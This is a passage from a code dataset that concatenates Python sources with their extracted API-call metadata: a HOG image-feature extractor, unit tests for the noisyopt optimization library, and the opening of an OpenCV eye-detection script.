"pickle.load",
"collections.Counter",
"os.mkdir",
"json.load",
"numpy.all",
"json.dump"
] |
[((156, 192), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""s2and_mini"""'], {}), "(DATA_DIR, 's2and_mini')\n", (168, 192), False, 'import os\n'), ((200, 226), 'os.path.exists', 'os.path.exists', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (214, 226), False, 'import os\n'), ((232, 252), 'os.mkdir', 'os.mkdir', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (240, 252), False, 'import os\n'), ((3052, 3079), 'collections.Counter', 'collections.Counter', (['blocks'], {}), '(blocks)\n', (3071, 3079), False, 'import collections\n'), ((4560, 4605), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""s2and_mini"""', 'dataset'], {}), "(DATA_DIR, 's2and_mini', dataset)\n", (4572, 4605), False, 'import os\n'), ((705, 736), 'os.path.join', 'os.path.join', (['DATA_DIR', 'dataset'], {}), '(DATA_DIR, dataset)\n', (717, 736), False, 'import os\n'), ((759, 801), 'os.path.join', 'os.path.join', (['DATA_DIR', 'dataset', 'file_name'], {}), '(DATA_DIR, dataset, file_name)\n', (771, 801), False, 'import os\n'), ((4617, 4648), 'os.path.exists', 'os.path.exists', (['data_output_dir'], {}), '(data_output_dir)\n', (4631, 4648), False, 'import os\n'), ((4658, 4683), 'os.mkdir', 'os.mkdir', (['data_output_dir'], {}), '(data_output_dir)\n', (4666, 4683), False, 'import os\n'), ((4786, 4819), 'json.dump', 'json.dump', (['c_filtered', '_json_file'], {}), '(c_filtered, _json_file)\n', (4795, 4819), False, 'import json\n'), ((4924, 4957), 'json.dump', 'json.dump', (['s_filtered', '_json_file'], {}), '(s_filtered, _json_file)\n', (4933, 4957), False, 'import json\n'), ((5058, 5091), 'json.dump', 'json.dump', (['p_filtered', '_json_file'], {}), '(p_filtered, _json_file)\n', (5067, 5091), False, 'import json\n'), ((5198, 5249), 'pickle.dump', 'pickle.dump', (['(X_filtered, k_filtered)', '_pickle_file'], {}), '((X_filtered, k_filtered), _pickle_file)\n', (5209, 5249), False, 'import pickle\n'), ((3360, 3415), 'numpy.all', 'np.all', (["[(i in s_filtered) for i in v['signature_ids']]"], {}), "([(i in s_filtered) for i in v['signature_ids']])\n", (3366, 3415), True, 'import numpy as np\n'), ((4699, 4756), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_clusters.json"""'], {}), "(data_output_dir, f'{dataset}_clusters.json')\n", (4711, 4756), False, 'import os\n'), ((4835, 4894), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_signatures.json"""'], {}), "(data_output_dir, f'{dataset}_signatures.json')\n", (4847, 4894), False, 'import os\n'), ((4973, 5028), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_papers.json"""'], {}), "(data_output_dir, f'{dataset}_papers.json')\n", (4985, 5028), False, 'import os\n'), ((5107, 5165), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_specter.pickle"""'], {}), "(data_output_dir, f'{dataset}_specter.pickle')\n", (5119, 5165), False, 'import os\n'), ((919, 944), 'pickle.load', 'pickle.load', (['_pickle_file'], {}), '(_pickle_file)\n', (930, 944), False, 'import pickle\n'), ((1127, 1148), 'json.load', 'json.load', (['_json_file'], {}), '(_json_file)\n', (1136, 1148), False, 'import json\n'), ((1772, 1793), 'json.load', 'json.load', (['_json_file'], {}), '(_json_file)\n', (1781, 1793), False, 'import json\n'), ((1952, 1973), 'json.load', 'json.load', (['_json_file'], {}), '(_json_file)\n', (1961, 1973), False, 'import json\n')]
|
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
def Compute_Block(cell_gradient_box):
k=0
hog_vector = np.zeros((bin_size*4*(cell_gradient_box.shape[0] - 1)*(cell_gradient_box.shape[1] - 1)))
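    #e.g. with bin_size=9, cell_size=8 and a 128x64 input: 16x8 cells -> 15x7 = 105 blocks, each 4*9 = 36 values, so 3780 values in total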
for i in range(cell_gradient_box.shape[0] - 1):
for j in range(cell_gradient_box.shape[1] - 1):
histogram_block = np.concatenate([cell_gradient_box[i][j],cell_gradient_box[i][j + 1],cell_gradient_box[i+1][j],cell_gradient_box[i+1][j + 1]])
            #Plot the block histogram (optional)
#x = np.arange(1,37,1)
#plt.title('histogram_block')
#plt.bar(x,histogram_block)
            #plt.savefig(r'path\filename.png')
#plt.show()
            #L2-normalize the block vector
L2_norm = histogram_block * histogram_block
L2_norm = L2_norm.sum()
L2_norm = np.power(L2_norm,0.5)
            extre_min = np.power(0.0001,2) #tiny epsilon in case L2_norm is zero, to avoid division by zero
L2_norm = L2_norm + extre_min
histogram_block = histogram_block / L2_norm
            #Plot the normalized block histogram (optional)
            #x = np.arange(1,37,1)
            #plt.title('histogram_block_L2')
            #plt.bar(x,histogram_block)
            #plt.savefig(r'path\filename.png')
#plt.show()
            #Append histogram_block to the overall HOG vector
hog_vector[36*k : 36*(k+1)] = histogram_block
k=k+1
return hog_vector
#Compute the orientation histogram of a single cell
def Cell_Gradient(cell_mag, cell_angle):
histogram_cell = np.zeros(bin_size) # 0 20 40 60 80 100 120 140 160
for k in range(cell_size):
for l in range(cell_size):
            cell_mag_catch = cell_mag[k][l] #read the magnitude value at this pixel
            cell_angle_catch = cell_angle[k][l]#read the angle value at this pixel
            if(cell_angle_catch % 20 == 0): #if the angle is exactly 0, 20, 40, ..., 160 or 180, assign the magnitude to a single bin
                bin_number = int(cell_angle_catch / 20) % bin_size #% bin_size so that 180 degrees falls into bin 0
                histogram_cell[bin_number] += cell_mag_catch
            else:#otherwise split the magnitude between the two neighbouring bins
                bin_number_small = int(cell_angle_catch / 20) % bin_size
                bin_number_big = (bin_number_small + 1) % bin_size #% bin_size because if bin_number_small is 8, adding 1 gives 9, which wraps back to bin 0
                ratio = cell_angle_catch % 20 #split the magnitude proportionally between bin_number_small and bin_number_big
histogram_cell[bin_number_small] += (cell_mag_catch * (1 - (ratio / 20)))
histogram_cell[bin_number_big] += (cell_mag_catch * (ratio / 20))
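                #e.g. an angle of 25 with magnitude m: bin 1 (20 deg) gets 0.75*m and bin 2 (40 deg) gets 0.25*m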
    #Plot the cell histogram (optional)
    #x = np.arange(0,180,20)
    #plt.xlabel("angle")
    #plt.ylabel("mag")
    #plt.title("Histogram of Gradient")
    #plt.bar(x,histogram_cell,width = 3)
    #plt.savefig(r'path\filename.png')
#plt.show()
return histogram_cell
def Computer_Cell(mag, angle):
cell_gradient_box = np.zeros(((int)(128 / cell_size), (int)(64 / cell_size), bin_size))
    #a 128*64 input image is divided into a (16, 8, 9) array of cell histograms
    for i in range(cell_gradient_box.shape[0]): #compute each cell's histogram, left to right, top to bottom
        for j in range(cell_gradient_box.shape[1]):
            #magnitude values of this cell
            cell_mag = mag[i * cell_size:(i + 1) * cell_size,j * cell_size:(j + 1) * cell_size]
            #angle values of this cell
            cell_angle = angle[i * cell_size:(i + 1) * cell_size,j * cell_size:(j + 1) * cell_size]
            #compute the cell histogram
cell_gradient_box[i][j] = Cell_Gradient(cell_mag, cell_angle)
return cell_gradient_box
def Compute_Sobel(img):
gradient_values_x = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=1)
gradient_values_y = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=1)
mag, angle = cv2.cartToPolar(gradient_values_x, gradient_values_y, angleInDegrees=True)
    #angle is in the range 0~360, but we only want 0~180 degrees
for i in range(angle.shape[0]):
for j in range(angle.shape[1]):
if(angle[i][j] > 180):
angle[i][j] = angle[i][j] - 180
'''
    #Show the images after Compute_Sobel
while True:
abs_x = abs(gradient_values_x)
abs_x = np.uint8(abs_x)
cv2.namedWindow("gradient_values_x",0)
cv2.resizeWindow("gradient_values_x", 256, 512)
cv2.imshow("gradient_values_x",abs_x)
abs_y = abs(gradient_values_y)
abs_y = np.uint8(abs_y)
cv2.namedWindow("gradient_values_y",0)
cv2.resizeWindow("gradient_values_y", 256, 512)
cv2.imshow("gradient_values_y",abs_y)
mag_uint8 = np.uint8(mag)
cv2.namedWindow("mag",0)
cv2.resizeWindow("mag", 256, 512)
cv2.imshow("mag",mag_uint8)
k = cv2.waitKey(0)
if k == 27:
            #press Esc to quit
cv2.destroyAllWindows()
break
'''
return mag, angle
#Image_Pretreatment: image preprocessing
def Image_Pretreatment(img):
    #resize the image
img_resize = cv2.resize(img, (64,128), interpolation=cv2.INTER_CUBIC)
img_resize_32 = np.float32(img_resize)
'''
    #Show the resized image
cv2.namedWindow("Resize",0)
cv2.resizeWindow("Resize", 256, 512)
cv2.imshow("Resize",img_resize)
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
    #Preprocessing option 1: divide the intensity by its maximum
    #img_after = (img_resize_32/np.max(img_resize_32))
    #Preprocessing option 2: divide the intensity by 255
    #img_after = (img_resize_32/255)
    #Preprocessing option 3: gamma correction
#img_after = np.power(img_resize_32,0.9)
'''
img_after_uint8 = np.uint8(img_after)
cv2.namedWindow("img_after",0)
cv2.resizeWindow("img_after", 256, 512)
cv2.imshow("img_after", img_after_uint8)
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
#return img_after
return img_resize_32
#Histogram_of_Oriented_Gradients (HOG)
def Histogram_of_Oriented_Gradients():
    #Read the image as grayscale
    img = cv2.imread(input_image_path,0)
    #Image_Pretreatment: image preprocessing
    img_finshed = Image_Pretreatment(img)
    #Compute Sobel gradients
    mag, angle = Compute_Sobel(img_finshed)
    #Compute cell histograms
    cell_gradient_box = Computer_Cell(mag, angle)
    #Compute block descriptors
hog_vector = Compute_Block(cell_gradient_box)
return hog_vector
if __name__ == '__main__':
    #input_image_path = (r'path\filename.png')
    this_file_path = os.getcwd() #get the current working directory
#input_image_path = (r'{}\running_man_1.png'.format(this_file_path))
input_image_path = (r'{}\running_man_2.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_3.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_4.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_5.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_6.png'.format(this_file_path))
#input_image_path = (r'{}\running_man_7.png'.format(this_file_path))
#input_image_path = (r'{}\landscape.png'.format(this_file_path))
    #Parameters
bin_size = 9
cell_size = 8
    #Run the pipeline
    hog_vector = Histogram_of_Oriented_Gradients() #output is hog_vector
    #Print the output length
    print ("HOG output length: {}".format(hog_vector.shape[0]))
    #Visualize the HOG feature vector
x = np.arange(hog_vector.shape[0])
plt.title('HOG')
plt.bar(x,hog_vector,color='red')
#plt.savefig(r'{}\running_man_1_result.png'.format(this_file_path))
    #plt.savefig(r'path\filename.png')
plt.show()
|
[
"numpy.arange",
"numpy.power",
"cv2.cartToPolar",
"os.getcwd",
"numpy.zeros",
"matplotlib.pyplot.bar",
"numpy.concatenate",
"matplotlib.pyplot.title",
"cv2.resize",
"cv2.imread",
"numpy.float32",
"cv2.Sobel",
"matplotlib.pyplot.show"
] |
[((141, 238), 'numpy.zeros', 'np.zeros', (['(bin_size * 4 * (cell_gradient_box.shape[0] - 1) * (cell_gradient_box.shape\n [1] - 1))'], {}), '(bin_size * 4 * (cell_gradient_box.shape[0] - 1) * (\n cell_gradient_box.shape[1] - 1))\n', (149, 238), True, 'import numpy as np\n'), ((1537, 1555), 'numpy.zeros', 'np.zeros', (['bin_size'], {}), '(bin_size)\n', (1545, 1555), True, 'import numpy as np\n'), ((3617, 3658), 'cv2.Sobel', 'cv2.Sobel', (['img', 'cv2.CV_64F', '(1)', '(0)'], {'ksize': '(1)'}), '(img, cv2.CV_64F, 1, 0, ksize=1)\n', (3626, 3658), False, 'import cv2\n'), ((3684, 3725), 'cv2.Sobel', 'cv2.Sobel', (['img', 'cv2.CV_64F', '(0)', '(1)'], {'ksize': '(1)'}), '(img, cv2.CV_64F, 0, 1, ksize=1)\n', (3693, 3725), False, 'import cv2\n'), ((3746, 3820), 'cv2.cartToPolar', 'cv2.cartToPolar', (['gradient_values_x', 'gradient_values_y'], {'angleInDegrees': '(True)'}), '(gradient_values_x, gradient_values_y, angleInDegrees=True)\n', (3761, 3820), False, 'import cv2\n'), ((4971, 5028), 'cv2.resize', 'cv2.resize', (['img', '(64, 128)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (64, 128), interpolation=cv2.INTER_CUBIC)\n', (4981, 5028), False, 'import cv2\n'), ((5049, 5071), 'numpy.float32', 'np.float32', (['img_resize'], {}), '(img_resize)\n', (5059, 5071), True, 'import numpy as np\n'), ((5889, 5920), 'cv2.imread', 'cv2.imread', (['input_image_path', '(0)'], {}), '(input_image_path, 0)\n', (5899, 5920), False, 'import cv2\n'), ((6339, 6350), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (6348, 6350), False, 'import os\n'), ((7200, 7230), 'numpy.arange', 'np.arange', (['hog_vector.shape[0]'], {}), '(hog_vector.shape[0])\n', (7209, 7230), True, 'import numpy as np\n'), ((7236, 7252), 'matplotlib.pyplot.title', 'plt.title', (['"""HOG"""'], {}), "('HOG')\n", (7245, 7252), True, 'import matplotlib.pyplot as plt\n'), ((7258, 7293), 'matplotlib.pyplot.bar', 'plt.bar', (['x', 'hog_vector'], {'color': '"""red"""'}), "(x, hog_vector, color='red')\n", (7265, 7293), True, 'import matplotlib.pyplot as plt\n'), ((7403, 7413), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7411, 7413), True, 'import matplotlib.pyplot as plt\n'), ((371, 507), 'numpy.concatenate', 'np.concatenate', (['[cell_gradient_box[i][j], cell_gradient_box[i][j + 1], cell_gradient_box[i +\n 1][j], cell_gradient_box[i + 1][j + 1]]'], {}), '([cell_gradient_box[i][j], cell_gradient_box[i][j + 1],\n cell_gradient_box[i + 1][j], cell_gradient_box[i + 1][j + 1]])\n', (385, 507), True, 'import numpy as np\n'), ((877, 899), 'numpy.power', 'np.power', (['L2_norm', '(0.5)'], {}), '(L2_norm, 0.5)\n', (885, 899), True, 'import numpy as np\n'), ((924, 943), 'numpy.power', 'np.power', (['(0.0001)', '(2)'], {}), '(0.0001, 2)\n', (932, 943), True, 'import numpy as np\n')]
|
import numpy as np
import numpy.testing as npt
import noisyopt
def test_minimize():
deltatol = 1e-3
## basic testing without stochasticity
def quadratic(x):
return (x**2).sum()
res = noisyopt.minimize(quadratic, np.asarray([0.5, 1.0]), deltatol=deltatol)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
res = noisyopt.minimize(quadratic, np.asarray([2.5, -3.2]), deltatol=deltatol)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
res = noisyopt.minimize(quadratic, np.asarray([2.5, -3.2, 0.9, 10.0, -0.3]),
deltatol=deltatol)
npt.assert_allclose(res.x, np.zeros(5), atol=deltatol)
npt.assert_equal(res.free, [False, False, False, False, False])
## test bound handling
res = noisyopt.minimize(quadratic, np.asarray([0.5, 0.5]),
bounds=np.asarray([[0, 1], [0, 1]]), deltatol=deltatol)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
res = noisyopt.minimize(quadratic, np.asarray([0.8, 0.8]),
bounds=np.asarray([[0.5, 1], [0.5, 1]]),
deltatol=deltatol)
npt.assert_allclose(res.x, [0.5, 0.5], atol=deltatol)
npt.assert_equal(res.free, [False, False])
## test determination of unconstrained variables
def quadratic_except_last(x):
return (x[:-1]**2).sum()
res = noisyopt.minimize(quadratic_except_last, np.asarray([0.5, 1.0]))
npt.assert_approx_equal(res.x[0], 0.0)
npt.assert_equal(res.free, [False, True])
## test errorcontrol for stochastic function
def stochastic_quadratic(x, seed=None):
prng = np.random if seed is None else np.random.RandomState(seed)
return (x**2).sum() + prng.randn(1) + 0.5*np.random.randn(1)
deltatol = 0.5
# test unpaired
res = noisyopt.minimize(stochastic_quadratic, np.array([4.55, 3.0]),
deltainit=2.0, deltatol=deltatol,
errorcontrol=True)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
# test paired
res = noisyopt.minimize(stochastic_quadratic, np.array([4.55, 3.0]),
deltainit=2.0, deltatol=deltatol,
errorcontrol=True, paired=True)
npt.assert_allclose(res.x, [0.0, 0.0], atol=deltatol)
npt.assert_equal(res.free, [False, False])
def test_bisect():
xtol = 1e-6
## simple tests
root = noisyopt.bisect(lambda x: x, -2, 2, xtol=xtol)
npt.assert_allclose(root, 0.0, atol=xtol)
root = noisyopt.bisect(lambda x: x-1, -2, 2, xtol=xtol)
npt.assert_allclose(root, 1.0, atol=xtol)
## extrapolate if 0 outside of interval
root = noisyopt.bisect(lambda x: x, 1, 2, xtol=xtol)
npt.assert_allclose(root, 0.0, atol=xtol)
npt.assert_raises(noisyopt.BisectException,
noisyopt.bisect, lambda x: x, 1, 2,
xtol=xtol, outside='raise')
## extrapolate with nonlinear function
root = noisyopt.bisect(lambda x: x+x**2, 1.0, 2, xtol=xtol)
assert root < 1.0
## test with stochastic function
xtol = 1e-1
func = lambda x: x - 0.25 + np.random.normal(scale=0.01)
root = noisyopt.bisect(noisyopt.AveragedFunction(func), -2, 2, xtol=xtol,
errorcontrol=True)
npt.assert_allclose(root, 0.25, atol=xtol)
def test_AveragedFunction():
## averaging a simple function
func = lambda x: np.asarray(x).sum()
avfunc = noisyopt.AveragedFunction(func, N=30)
av, avse = avfunc([1.0, 1.0])
npt.assert_equal(av, 2.0)
npt.assert_equal(avse, 0.0)
# se of function value difference between two points is zero
# (as function evaluation is not stochastic)
diffse = avfunc.diffse([1.0, 1.0], [2.0, 1.0])
npt.assert_equal(diffse, 0.0)
## changing the number of evaluations
avfunc.N *= 2
npt.assert_equal(avfunc.N, 60)
## averaging a stochastic function
func = lambda x: np.asarray(x).sum() + np.random.randn()
avfunc = noisyopt.AveragedFunction(func, N=30)
# check that reevaluation gives the same thing due to caching
av30_1, avse30_1 = avfunc([1.0, 1.0])
av30_2, avse30_2 = avfunc([1.0, 1.0])
npt.assert_equal(av30_1, av30_2)
npt.assert_equal(avse30_1, avse30_2)
    # check that the standard error decreases when N is increased
avfunc.N *= 2
av60, avse60 = avfunc([1.0, 1.0])
assert av30_1 != av60
assert avse30_1 > avse60
# test with floating point N
noisyopt.AveragedFunction(func, N=30.0, paired=True)
if __name__ == '__main__':
npt.run_module_suite()
|
[
"numpy.random.normal",
"numpy.testing.assert_equal",
"numpy.testing.assert_approx_equal",
"numpy.testing.assert_allclose",
"numpy.testing.assert_raises",
"numpy.asarray",
"noisyopt.bisect",
"numpy.array",
"numpy.zeros",
"numpy.testing.run_module_suite",
"numpy.random.randn",
"noisyopt.AveragedFunction",
"numpy.random.RandomState"
] |
[((285, 338), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (304, 338), True, 'import numpy.testing as npt\n'), ((343, 385), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (359, 385), True, 'import numpy.testing as npt\n'), ((474, 527), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (493, 527), True, 'import numpy.testing as npt\n'), ((532, 574), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (548, 574), True, 'import numpy.testing as npt\n'), ((767, 830), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False, False, False, False]'], {}), '(res.free, [False, False, False, False, False])\n', (783, 830), True, 'import numpy.testing as npt\n'), ((1010, 1063), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (1029, 1063), True, 'import numpy.testing as npt\n'), ((1068, 1110), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (1084, 1110), True, 'import numpy.testing as npt\n'), ((1295, 1348), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.5, 0.5]'], {'atol': 'deltatol'}), '(res.x, [0.5, 0.5], atol=deltatol)\n', (1314, 1348), True, 'import numpy.testing as npt\n'), ((1353, 1395), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (1369, 1395), True, 'import numpy.testing as npt\n'), ((1598, 1636), 'numpy.testing.assert_approx_equal', 'npt.assert_approx_equal', (['res.x[0]', '(0.0)'], {}), '(res.x[0], 0.0)\n', (1621, 1636), True, 'import numpy.testing as npt\n'), ((1641, 1682), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, True]'], {}), '(res.free, [False, True])\n', (1657, 1682), True, 'import numpy.testing as npt\n'), ((2146, 2199), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (2165, 2199), True, 'import numpy.testing as npt\n'), ((2204, 2246), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (2220, 2246), True, 'import numpy.testing as npt\n'), ((2464, 2517), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['res.x', '[0.0, 0.0]'], {'atol': 'deltatol'}), '(res.x, [0.0, 0.0], atol=deltatol)\n', (2483, 2517), True, 'import numpy.testing as npt\n'), ((2522, 2564), 'numpy.testing.assert_equal', 'npt.assert_equal', (['res.free', '[False, False]'], {}), '(res.free, [False, False])\n', (2538, 2564), True, 'import numpy.testing as npt\n'), ((2634, 2680), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x)', '(-2)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x, -2, 2, xtol=xtol)\n', (2649, 2680), False, 'import noisyopt\n'), ((2685, 2726), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(0.0)'], {'atol': 'xtol'}), '(root, 0.0, atol=xtol)\n', (2704, 2726), True, 'import numpy.testing as npt\n'), ((2739, 2789), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x - 1)', '(-2)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x - 1, -2, 2, xtol=xtol)\n', (2754, 2789), False, 
'import noisyopt\n'), ((2792, 2833), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(1.0)'], {'atol': 'xtol'}), '(root, 1.0, atol=xtol)\n', (2811, 2833), True, 'import numpy.testing as npt\n'), ((2890, 2935), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x)', '(1)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x, 1, 2, xtol=xtol)\n', (2905, 2935), False, 'import noisyopt\n'), ((2940, 2981), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(0.0)'], {'atol': 'xtol'}), '(root, 0.0, atol=xtol)\n', (2959, 2981), True, 'import numpy.testing as npt\n'), ((2986, 3097), 'numpy.testing.assert_raises', 'npt.assert_raises', (['noisyopt.BisectException', 'noisyopt.bisect', '(lambda x: x)', '(1)', '(2)'], {'xtol': 'xtol', 'outside': '"""raise"""'}), "(noisyopt.BisectException, noisyopt.bisect, lambda x: x, 1,\n 2, xtol=xtol, outside='raise')\n", (3003, 3097), True, 'import numpy.testing as npt\n'), ((3197, 3253), 'noisyopt.bisect', 'noisyopt.bisect', (['(lambda x: x + x ** 2)', '(1.0)', '(2)'], {'xtol': 'xtol'}), '(lambda x: x + x ** 2, 1.0, 2, xtol=xtol)\n', (3212, 3253), False, 'import noisyopt\n'), ((3515, 3557), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['root', '(0.25)'], {'atol': 'xtol'}), '(root, 0.25, atol=xtol)\n', (3534, 3557), True, 'import numpy.testing as npt\n'), ((3678, 3715), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {'N': '(30)'}), '(func, N=30)\n', (3703, 3715), False, 'import noisyopt\n'), ((3754, 3779), 'numpy.testing.assert_equal', 'npt.assert_equal', (['av', '(2.0)'], {}), '(av, 2.0)\n', (3770, 3779), True, 'import numpy.testing as npt\n'), ((3784, 3811), 'numpy.testing.assert_equal', 'npt.assert_equal', (['avse', '(0.0)'], {}), '(avse, 0.0)\n', (3800, 3811), True, 'import numpy.testing as npt\n'), ((3983, 4012), 'numpy.testing.assert_equal', 'npt.assert_equal', (['diffse', '(0.0)'], {}), '(diffse, 0.0)\n', (3999, 4012), True, 'import numpy.testing as npt\n'), ((4078, 4108), 'numpy.testing.assert_equal', 'npt.assert_equal', (['avfunc.N', '(60)'], {}), '(avfunc.N, 60)\n', (4094, 4108), True, 'import numpy.testing as npt\n'), ((4223, 4260), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {'N': '(30)'}), '(func, N=30)\n', (4248, 4260), False, 'import noisyopt\n'), ((4415, 4447), 'numpy.testing.assert_equal', 'npt.assert_equal', (['av30_1', 'av30_2'], {}), '(av30_1, av30_2)\n', (4431, 4447), True, 'import numpy.testing as npt\n'), ((4452, 4488), 'numpy.testing.assert_equal', 'npt.assert_equal', (['avse30_1', 'avse30_2'], {}), '(avse30_1, avse30_2)\n', (4468, 4488), True, 'import numpy.testing as npt\n'), ((4672, 4724), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {'N': '(30.0)', 'paired': '(True)'}), '(func, N=30.0, paired=True)\n', (4697, 4724), False, 'import noisyopt\n'), ((4757, 4779), 'numpy.testing.run_module_suite', 'npt.run_module_suite', ([], {}), '()\n', (4777, 4779), True, 'import numpy.testing as npt\n'), ((238, 260), 'numpy.asarray', 'np.asarray', (['[0.5, 1.0]'], {}), '([0.5, 1.0])\n', (248, 260), True, 'import numpy as np\n'), ((426, 449), 'numpy.asarray', 'np.asarray', (['[2.5, -3.2]'], {}), '([2.5, -3.2])\n', (436, 449), True, 'import numpy as np\n'), ((615, 655), 'numpy.asarray', 'np.asarray', (['[2.5, -3.2, 0.9, 10.0, -0.3]'], {}), '([2.5, -3.2, 0.9, 10.0, -0.3])\n', (625, 655), True, 'import numpy as np\n'), ((735, 746), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (743, 746), True, 'import numpy as np\n'), ((898, 920), 'numpy.asarray', 
'np.asarray', (['[0.5, 0.5]'], {}), '([0.5, 0.5])\n', (908, 920), True, 'import numpy as np\n'), ((1151, 1173), 'numpy.asarray', 'np.asarray', (['[0.8, 0.8]'], {}), '([0.8, 0.8])\n', (1161, 1173), True, 'import numpy as np\n'), ((1570, 1592), 'numpy.asarray', 'np.asarray', (['[0.5, 1.0]'], {}), '([0.5, 1.0])\n', (1580, 1592), True, 'import numpy as np\n'), ((2010, 2031), 'numpy.array', 'np.array', (['[4.55, 3.0]'], {}), '([4.55, 3.0])\n', (2018, 2031), True, 'import numpy as np\n'), ((2315, 2336), 'numpy.array', 'np.array', (['[4.55, 3.0]'], {}), '([4.55, 3.0])\n', (2323, 2336), True, 'import numpy as np\n'), ((3414, 3445), 'noisyopt.AveragedFunction', 'noisyopt.AveragedFunction', (['func'], {}), '(func)\n', (3439, 3445), False, 'import noisyopt\n'), ((957, 985), 'numpy.asarray', 'np.asarray', (['[[0, 1], [0, 1]]'], {}), '([[0, 1], [0, 1]])\n', (967, 985), True, 'import numpy as np\n'), ((1210, 1242), 'numpy.asarray', 'np.asarray', (['[[0.5, 1], [0.5, 1]]'], {}), '([[0.5, 1], [0.5, 1]])\n', (1220, 1242), True, 'import numpy as np\n'), ((1823, 1850), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (1844, 1850), True, 'import numpy as np\n'), ((3358, 3386), 'numpy.random.normal', 'np.random.normal', ([], {'scale': '(0.01)'}), '(scale=0.01)\n', (3374, 3386), True, 'import numpy as np\n'), ((4192, 4209), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (4207, 4209), True, 'import numpy as np\n'), ((1901, 1919), 'numpy.random.randn', 'np.random.randn', (['(1)'], {}), '(1)\n', (1916, 1919), True, 'import numpy as np\n'), ((3645, 3658), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (3655, 3658), True, 'import numpy as np\n'), ((4170, 4183), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (4180, 4183), True, 'import numpy as np\n')]
|
# import lib.pbcvt as pbcvt
import cv2
import numpy as np
import sys
from time import time
def distance(o1, o2):
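    # center-to-center Euclidean distance between two (x, y, w, h) bounding boxes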
(x1,y1,w1,h1) = o1
(x2,y2,w2,h2) = o2
c1 = (x1+w1/2,y1+h1/2)
c2 = (x2+w2/2,y2+h2/2)
return np.hypot(c1[0]-c2[0],c1[1]-c2[1])
cv2.namedWindow("preview")
cv2.namedWindow("preview2")
cv2.namedWindow("preview3")
vc = cv2.VideoCapture(int(sys.argv[1]))
vc.set(3,int(sys.argv[2]))
vc.set(4,int(sys.argv[3]))
print(vc.get(3))
print(vc.get(4))
# vout = None
# if (int(sys.argv[5])):
# fourcc = cv2.VideoWriter_fourcc(*'x264')
# vout = cv2.VideoWriter('pupiltest.mp4', fourcc, 24.0, (int(vc.get(3)),int(vc.get(4))))
if vc.isOpened(): # try to get the first frame
rval, frame = vc.read()
else:
rval = False
ptime = time()
nf = 0
# face_cascade = cv2.CascadeClassifier('trained/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('trained/haarcascade_eye.xml')
